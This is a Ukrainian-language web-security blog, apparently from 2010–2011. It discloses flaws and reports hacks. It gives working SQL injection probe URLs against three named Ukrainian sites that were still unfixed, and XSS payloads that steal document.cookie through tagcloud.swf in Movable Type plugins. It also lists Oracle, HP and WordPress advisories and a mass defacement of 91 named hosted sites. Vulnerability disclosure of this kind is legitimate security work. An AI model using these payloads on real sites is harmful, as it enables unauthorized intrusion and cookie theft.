Websecurity - Веб безпека

14.07.2010

У червні, 30.06.2010, я знайшов SQL Injection уразливість на проекті http://www.slavske.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.05.2011

SQL Injection:

http://www.slavske.org.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

Раніше я вже писав про уразливість в sfWpCumulusPlugin для symfony. Така ж уразливість є і в плагіні MT-Cumulus для Movable Type, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

В березні, 14.03.2011, я знайшов Cross-Site Scripting уразливість в Flash Tag Cloud та MT-Cumulus для Movable Type. Про що найближчим часом повідомлю розробнику.

Спочатку розробник зробив віджет Flash Tag Cloud For MT 4, а вже потім зробив повноцінний плагін MT-Cumulus для Movable Type. І в обох додатках наявна дана XSS уразливість.

XSS:

Для Flash Tag Cloud For MT 4:

http://site/scripts/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Для MT-Cumulus:

http://site/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі віджет Flash Tag Cloud For MT 4 та плагін MT-Cumulus v1.02 і попереді версії.

26.04.2011

Виявлені численні уразливості в додатках Oracle і Sun.

Уразливі продукти: Oracle 10g, Oracle 11g, WebLogic Server 8.1, Oracle Application Server 10g, Oracle E-Business Suite Release 11i, PeopleSoft Enterprise CRM 8.9, JRockit 27.6 та інші продукти Oracle.

73 уразливості в різних додатках.

• Oracle Application Server Authentication Bypass Remote Code Execution Vulnerability (деталі)
• Oracle Critical Patch Update Advisory - April 2011 (деталі)

11.05.2011

Додаткова інформація.

• Oracle Malformed Network Package Spins CPU (деталі)
• XSS in Oracle AS Portal 10g (деталі)
• XSS in locale parameter on IASTOP_CS_FARM_PAGE.html (деталі)
• Multiple SQL Injection in Oracle Enterprise Manager Service Level component (деталі)
• Oracle Malformed Network Package Spins CPU (деталі)
• Oracle JD Edwards JDENET Remote Logging Deactivation (деталі)
• Oracle JD Edwards JDENET Buffer Overflow (деталі)
• Oracle JD Edwards JDENET Firewall Bypass (деталі)
• Oracle JD Edwards JDENET USRBROADCAST Denial of Service (деталі)
• Oracle JD Edwards JDENET Kernel Denial of Service (деталі)
• Oracle JD Edwards JDENET SawKernel Remote Password Disclosure (деталі)
• Oracle JD Edwards JDENET Kernel Shutdown (деталі)
• Oracle JD Edwards JDENET CallObjectKernel Remote Command Execution (деталі)

В минулому місяці, 30.04.2011, відбувся масовий взлом сайтів на сервері Tavrida Network. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер української компанії Tavrida Network. Взлом відбувся після згаданого масового взлому сайтів на сервері Realon Service.

Всього був взломаний 91 сайт на сервері провайдера Tavrida Network (IP 212.110.143.80). Це наступні сайти: www.tradecreation.com, www.itallux.com.ua, www.foxauto.com.ua, www.press.crimea.ua, www.goldnika.com.ua, www.qamt.com.ua, www.palas.ua, www.evrostroy.com.ua, www.galereya2008.com, www.gazifikator.com.ua, www.dnop.crimea.ua, www.evrograd.com.ua, www.flint.crimea.ua, www.hora.crimea.ua, www.rccombatglider.com, www.grandpiano.com.ua, www.toyotaparts.com.ua, www.toyota.org.ua, www.kerchmlin.com, www.tours.crimea.ua, www.primer.crimea.ua, www.flat.crimea.ua, www.fijet.com.ua, www.hipath.crimea.ua, www.eqp.com.ua, www.krimresurs.com.ua, www.krymnovysvet.ru, www.party.crimea.ua, www.airtech.com.ua, www.vanlicht.com.ua, www.prodmash.crimea.com, www.rest-irey.com.ua, www.pmp.crimea.ua, www.pomol.com.ua, www.rasswet.crimea.ua, www.tehnounit.com.ua, www.ppu.gov.ua, www.lagoda.crimea.ua, www.alushta-dom.com, www.yantar-a.com, www.xtime.com.ua, www.upb.gov.ua, www.upiterm.com, www.wint.com.ua, www.webcreation.com.ua, www.korporativ.crimea.ua, www.swanlake.com.ua, www.pioner.crimea.ua, www.neapol-m.com, www.novsvet.com, www.mitsubishi-newavto.com, www.mirfilmov.com, www.moneyonline.com.ua, www.med-export.com.ua, www.mazda.biz.ua, www.willa-lubimaya.com.ua, www.novagroup.com.ua, www.tuberculosis.com.ua, www.nikolaevka-leto.com.ua, www.lombard-econom.com.ua, www.otdixsudak.crimea.ua, www.vashvibor.com.ua, www.crimeahost.com, www.electra-olimp.com, www.cretc.crimea.ua, www.depositu.net, www.cruise.crimea.ua, www.cretc.com.ua, www.crimeadog.com, www.chikurov.com.ua, www.chikurov.spb.ru, www.cimmeros.com, www.chikurov.com, www.cctgo.com, www.cacao.net.ua, www.biodiesel.crimea.ua, www.biodiesel-ua.com, www.biodiesel-biofuel-ua.com, www.aviamodel.com, www.autoshtamp.com.ua, www.africanmaritimeacademy.net, www.alphatest.com.ua, www.architecturemaket.com, www.auto-lombard.crimea.ua, www.seotrademarket.com, www.service.yalta.ua, www.siemens.crimea.ua, www.silcont.com.ua, www.solamar.crimea.ua, www.sudomodel.com, www.summit.crimea.ua. Серед них українські державні сайти www.ppu.gov.ua та www.upb.gov.ua.

Всі зазначені сайти були взломані 30 квітня 2011 року. Дефейси 91 сайту проведено хакерами з 1923Turk-Grup. Окрім цього один сайт на цьому сервері був вломаний Swan ще 09.08.2009.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх цих сайтів, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

13.07.2010

У червні, 30.06.2010, я знайшов SQL Injection уразливість на проекті http://www.mitsubishi-sklad.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

11.05.2011

SQL Injection:

http://www.mitsubishi-sklad.com.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

Пропоную вашій увазі нову добірку уразливих сайтів від Dementor (з числа українських веб сайтів). Дані уразливості він знайшов та оприлюднив в 2010-2011 роках.

• Вразливості на fayna.com.ua
• Вразливості на zakarpattya.net.ua
• Вразливості на ktc-ua.com (онлайн магазин)
• Вразливості на opensource.com.ua (онлайн магазин)
• XSS вразливості на сайтах, створених на платформі prom.ua

В даній добірці уразливості в веб додатках:

• Visual Synapse HTTP Server Directory Traversal Vulnerability (деталі)
• SQL Injection in Eclime (деталі)
• XSS in Eclime (деталі)
• HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows Running Adobe Flash, Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Modification (деталі)
• SQL Injection in Eclime (деталі)
• OsCSS Remote File Upload Exploit (деталі)
• HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS), Privilege Escalation (деталі)
• OsCSS 1.2.2a Authentication Bypass (деталі)
• DibaCommerce Authentication Bypass (деталі)
• HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Arbitrary File Download (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kupi-rashodniki.net - інфекція була виявлена 09.05.2011. Зараз сайт не входить до переліку підозрілих.
• http://kanduk.com.ua - інфекція була виявлена 08.05.2011. Зараз сайт не входить до переліку підозрілих.
• http://kropuva.ucoz.ua - інфекція була виявлена 10.02.2011. Зараз сайт не входить до переліку підозрілих.
• http://zummer.com.ua - інфекція була виявлена 28.02.2011. Зараз сайт не входить до переліку підозрілих.
• http://art-game.at.ua - інфекція була виявлена 29.03.2011. Зараз сайт не входить до переліку підозрілих.

12.07.2010

У червні, 30.06.2010, я знайшов SQL Injection уразливість на проекті http://fgspro.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

10.05.2011

SQL Injection:

http://fgspro.com/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP-Ajax-Recent-Posts, WP Photo Album та Daily Maui Photo Widget. Для котрих з’явилися експлоіти. WP-Ajax-Recent-Posts - це плагін для виведення списку останніх постів, WP Photo Album - це плагін для створення фото альбомів, Daily Maui Photo Widget - це плагін для розміщення фотографій з Maui.

• XSS in WP-Ajax-Recent-Posts wordpress plugin (деталі)
• XSS in WP Photo Album wordpress plugin (деталі)
• XSS in Daily Maui Photo Widget wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.